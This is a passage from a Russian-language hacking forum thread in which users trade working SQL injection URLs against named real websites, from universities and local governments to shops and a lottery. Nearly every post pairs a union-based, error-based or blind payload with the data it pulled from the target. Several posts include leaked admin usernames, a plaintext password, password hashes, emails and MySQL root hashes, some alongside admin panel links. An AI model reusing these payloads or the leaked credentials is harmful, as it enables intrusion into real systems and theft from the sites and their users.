SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Code:
    http://eng.tspu.edu.ru/shou_biog_sotr.php?id=-1282 union select 1,user(),3,4,5,version(),7,8,9,database(),11,12,13--

    10.0.16-MariaDB-log
    polevivan@localhost
    engtspu1
     
    1. WallHack

      WallHack Elder - Старейшина

      Joined:
      18 Jul 2013
      Messages:
      306
      Likes Received:
      138
      Reputations:
      33
      Система активной рекламы
      Code:
      http://revda-bux.ru/news.php?id=-1%27+union+select+1,2,password,email+from+tb_users+--+
      5.5.41-0ubuntu0.12.04.1
      mixan_2@localhost
      Админка
      Code:
      http://revda-bux.ru/admin
       
      danil7493 likes this.
      1. MaxFast

        MaxFast Elder - Старейшина

        Joined:
        12 Oct 2011
        Messages:
        575
        Likes Received:
        149
        Reputations:
        94
        Code:
        http://www.aql.uz/articles.php?cat=18'+and+extractvalue(1,concat(0x3a,(select+version())))+--+
        XPATH syntax error: ':5.5.42-cll'
         
        Br@!ns likes this.
        1. WallHack

          WallHack Elder - Старейшина

          Joined:
          18 Jul 2013
          Messages:
          306
          Likes Received:
          138
          Reputations:
          33
          Code:
          http://www.cniim.com/tech.php?id=-30+union+select+1,version()+--+
          5.0.75-log
          [email protected]
          Code:
          http://www.cniim.com/admin/
          Яндекс тИЦ 30 Google Page Rank 1
           
          1. totenkopf

            totenkopf Elder - Старейшина

            Joined:
            19 Jul 2010
            Messages:
            92
            Likes Received:
            64
            Reputations:
            19
            Пиндосия

            Code:
            http://www.dodgebyowner.com/property-single.cfm?pid=1205+limit+0+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,concat_ws(0x3a,user(),version(),database()),50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+--+
            [email protected]:5.5.18:design08_dodgebyowner

            Code:
            http://www.explorekansas.org/page.php?id=140'+limit+0+/*!UNION*/+/*!SELECT*/+1,2,3,concat_ws(0x3a,user(),version(),database())+--+
            sampler_mkiHHp1@localhost:5.0.96-community:sampler_kstblz1

            Code:
            http://www.franklincountyiowa.com/category_details.php?sid=10+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8+--+
            [email protected]:5.1.70-log:521613_fcdaia

            Code:
            http://www.fuddruckers.com/local/location.php?s=379'+limit+0+UNION+SELECT+concat_ws(0x3a,0x273E3C68313E,user(),version(),database())+--+
            [email protected]:5.1.61-log:518111_FuddsDev

            Code:
            http://www.indianamri.com/index.php?page=Indiana_MRI_Bloomington_-_MRI_Services_for_Bloomington_and_Southern_Indiana_Magnetic_Resonance_Imaging&menu_id=1'+limit+0+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database())+--+
            [email protected]:5.1.56-log:indianamri

            Code:
            http://www.itamed.com/mcms/itamedt/content.cfm?pulldata=scmsmembers.cfm&function=members&perform=memberappita&entity_id=11+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10+--+
            [email protected]:5.6.23-log:itamed1

            Code:
            http://www.lhnmedia.com/detail.php?t=1409+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15+--+
            luth@localhost:5.0.24:lutheran

            Code:
            http://www.littlemomentsbigmagic.com/index.php?title=About-Us&cat=11'+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database())+--+
            [email protected]:5.0.91:bbbscontent

            Code:
            http://www4.aacrao.org/publications/catalog.php?item=0141'+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+--+
            publicationsuser@localhost:5.5.38:publications

            Code:
            http://accessnca.org/index.php?id=4+limit+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13+--+
            [email protected]:5.0.96-log:anc2009
             
            UXOR likes this.
            1. WallHack

              WallHack Elder - Старейшина

              Joined:
              18 Jul 2013
              Messages:
              306
              Likes Received:
              138
              Reputations:
              33
              Русский интернет магазин часов
              Code:
              http://www.agiperwatch.ru/new.php?id=-40%27+union+select+1,version(),3,4,5,6+--+
              Version 5.1.49-3
              User root@localhost

              Code:
              Db User & Pass: root:*10B1BEE157125F829776C8185F0211EC318BC8B2:localhost
              Compile OS:     debian-linux-gnu
              Db User & Pass: root:*10B1BEE157125F829776C8185F0211EC318BC8B2:debian-6-64-isplite.ru
              Db User & Pass: root:*10B1BEE157125F829776C8185F0211EC318BC8B2:127.0.0.1
              Db User & Pass: debian-sys-maint:*C071BEEA66158840BB2AADF24693F0BCBCE185CD:localhost
              Яндекс тИЦ 30 Google Page Rank 1
               
              1. danil7493

                danil7493 Member

                Joined:
                24 Jul 2011
                Messages:
                23
                Likes Received:
                7
                Reputations:
                10
                Code:
                http://www.minddesign.co.uk/show.php?id=4832'+union+all+select+1,2,3,concat(0x217e21,concat(user(),0x332150,version(),0x332150,database()),0x217e21),5,6,7,8,9,10,11,12,13,14,15,16+--+
                !~!jacobs_mddata@localhost3!P5.6.233!Pjacobs_mddata!~!
                
                http://www.carnegiegreenaway.org.uk/shadowingsite/review.php?id=999999.9+union+all+select+concat(0x3d7e3d,concat(user(),0x332150,version(),0x332150,database()),0x3d7e3d),2,3,4,5,6
                =~=admin_ckg@localhost3!P5.1.73-cll3!Padmin_ckg=~=
                http://www.carnegiegreenaway.org.uk/shadowingsite/review.php?id=999999.9+union+all+select(select+concat(0x3d7e3d,ifnull(user,char(32)),0x332150,ifnull(pass,char(32)),0x3d7e3d)+from+admin_ckg.users+limit+0,1),2,3,4,5,6
                =~=admin3!P$2a$08$GAaYWnA0dyo2cI0fvPYGBeSM1bnm1682zNwGowdigO85eGN9hDbu.=~=
                
                http://membr.uwm.edu/review.php?id=999999.9+union+all+select+1,concat(0x3d7e3d,concat(user(),0x332150,version(),0x332150,database()),0x3d7e3d),3
                <a href="=~=membr@localhost3!P5.1.733!Pmembr=~=" target="_blank">
                
                http://urc.tauniverse.com/db/review.php?ID=-2577+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(0x3d7e3d,concat(user(),0x332150,version(),0x332150,database()),0x3d7e3d),17,18,19,20,21,22,23,24,25
                =~=urc_urc@localhost3!P5.1.73-cll3!Purc_reviews=~=
                
                https://playlotto.co.ug/mediafiles/media-draw.php?id=999999.9+union+all+select+1,2,3,4,5,6,7,8,9,concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d),11,12,13,14,15,16,17,18,19,20,21
                [email protected]=!=5.5.41-0+wheezy1=!=playlmnqrd_db2=~=
                
                https://playlotto.co.ug/mediafiles/media-draw.php?id=999999.9+union+all+select+1,2,3,4,5,6,7,8,9,(select+concat(0x3d7e3d,ifnull(id,char(32)),0x3d213d,ifnull(username,char(32)),0x3d213d,ifnull(passw,char(32)),0x3d7e3d)+from+playlmnqrd_db2.users+limit+0,1),11,12,13,14,15,16,17,18,19,20,21
                =~=1=!=admin=!=uglotto987=~=
                
                http://seekdl.org/conferences_page_papers.php?confid=999999.9'+union+all+select+1,2,3,4,5,concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d),7,8,9,10,11,12,13,14,15+and+'0'='0
                =~=ibmhgxtv_seeknew@localhost=!=5.5.42-cll=!=ibmhgxtv_seeknew=~=
                
                http://www.harbor.ru/catalogue/cat.php?id=3'+union+all+select+1,concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d),3+and+'0'='0
                [email protected]=!=5.5.35-1+wheezy1+mh1-log=!=u367687_catalog=~=
                
                http://www.harbor.ru/catalogue/cat.php?id=3'+union+all+select+1,(select+concat(0x3d7e3d,ifnull(userid,char(32)),0x3d213d,ifnull(username,char(32)),0x3d213d,ifnull(password,char(32)),0x3d213d,ifnull(passworddate,char(32)),0x3d213d,ifnull(email,char(32)),0x3d213d,ifnull(salt,char(32)),0x3d7e3d)+from+u367687.user+limit+0,1),3+and+'0'='0
                =~=1=!=Liliya_Gorina=!=28d329b3b119754282c7d4478fbe55da=!=2013-01-19=!=inform@harbor.ru=!=nR}=~= и тд 160к
                
                http://norramore.se/nm.php?id=999999.9'+union+all+select+1,2,3,4,5,concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d),7+and+'0'='0
                =~=norramore@[email protected]=~=5.5.34-log=~=norramore_se=~=
                
                http://www.lakra-products.ru/sert.php?id=999999.9+union+all+select+1,2,3,4,5,concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62
                [email protected]=~=5.1.41-log=~=lakra_products=~=
                
                http://www.lonergan.at/philo/sert.php?ID=999999.9+union+all+select+concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d)
                =~=www00572@localhost=~=5.5.41-0=~=usrdb_www00572=~=
                
                http://www.trishasattic.com/lot.php?id=26+union+all+select+1,2,3,4,concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d),5,6,7
                [email protected]=~=5.5.32-log=~=trishas_attic=~=
                
                http://norramore.se/nm.php?id=999999.9'+union+all+select+1,2,3,4,5,concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d),7+and+'0'='0
                =~=norramore@[email protected]=~=5.5.34-log=~=norramore_se=~=
                
                http://kvartira.remc.ru/lot.php?id=999999.9+union+all+select+1,concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
                [email protected]=~=5.5.30-log=~=b2boffice_ru=~=
                
                http://www.casa-de-lujo.com/lot.php?id=135'+and(select+1+from(select+count(*),concat((select(select+concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1
                =~=casadelujo_main@localhost=~=5.5.36-34.0-632.precise=~=
                
                http://www.rennesencheres.com/lot.php?id=(select+1+from(select+count(*),concat((select(select+concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
                '=~=bretagne_enchere@localhost=~=5.1.73-1=~=bretagne_enchere=~=1'
                
                http://technotronik.kz/lot.php?id=999999.9+union+all+select+binary(concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d))
                =~=v_4656_shopi@localhost=!=5.5.42-cll-lve=!=v_4656_shopi=~=
                
                http://www.compagniaperlamusica.com/iniziativa.php?id=(select+1+from(select+count(*),concat((select(select+concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
                =~=cplmusr@localhost=~=5.0.51a-24+lenny5-log=~=
                
                http://www.cgilparma.it/CGILPR_Portal/CGILPR_pubblico/iniziativa.php?in=999999.9+union+all+select+1,2,3,4,concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d),6,7,8,9,10,11,12,13,14--
                [email protected]=!=4.1.23-pro-log=!=cgilparma_it_data=~=
                
                http://centroiniziativecodroipo.altervista.org/iniziativa.php?id=999999.9+union+all+select+1,2,3,4,5,concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d),7,8,9,10,11,12,13
                =~=2531268@localhost=!=5.1.71-community-log=!=my_centroiniziativecodroipo=~=
                
                http://cicodroipo.altervista.org/iniziativa.php?id=-57+union+all+select+1,2,3,4,5,6,concat(0x3d7e3d,concat(user(),0x3d213d,version(),0x3d213d,database()),0x3d7e3d),7,8,9,10,11,12,13--
                =~=cicodroipo@localhost=!=5.1.71-community-log=!=my_cicodroipo=~=
                
                http://cicodroipo.altervista.org/iniziativa.php?id=-57+union+all+select+1,2,3,4,5,6,(select+concat(0x3d7e3d,ifnull(id_use,char(32)),0x3d213d,ifnull(email,char(32)),0x3d213d,ifnull(pass,char(32)),0x3d7e3d)+from+my_cicodroipo.user+limit+0,1),7,8,9,10,11,12,14--
                =~=fabrizio_ceripp@localhost=!=5.5.42-cll=!=fabrizio_ceripp=~=
                
                http://www.bobrgames.com/game.php?id=(select+1+from(select+count(*),concat((select(select+concat(0x3d7e3d,user(),0x3d7e3d,version(),0x3d7e3d,database(),0x3d7e3d))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
                [email protected]=~=5.5.34-32.0-log=~=a7489_bobrgames=
                 
                1. grimnir

                  grimnir Members of Antichat

                  Joined:
                  23 Apr 2012
                  Messages:
                  1,114
                  Likes Received:
                  830
                  Reputations:
                  231
                  Code:
                  http://www.umbc.edu/careerpath/profileDetail.php?profileID=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,/**/vErSiOn(),0x217e21))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)
                  трафф 2.9кк
                  5.5.13-log [email protected]
                   
                  _________________________
                  KIR@PRO, Gorev and YaBtr like this.
                  1. palec2006

                    palec2006 Banned

                    Joined:
                    30 Oct 2012
                    Messages:
                    38
                    Likes Received:
                    33
                    Reputations:
                    8
                    Сайт биомусора
                    http://ultras.org.ua/league/'XOR(if(ascii(substring((select+version()),1))>=53,BENCHMARK(2000000,MD5(NOW())),0))OR'.htm

                    5.5.34-0ubuntu0.13.04.1





                    Тема переехала по адресу http://forum.antichat.ru/threads/424558/
                     
                    #15949 palec2006, 18 Apr 2015
                    Last edited by a moderator: 27 Apr 2015
                    Thread Status:
                    Not open for further replies.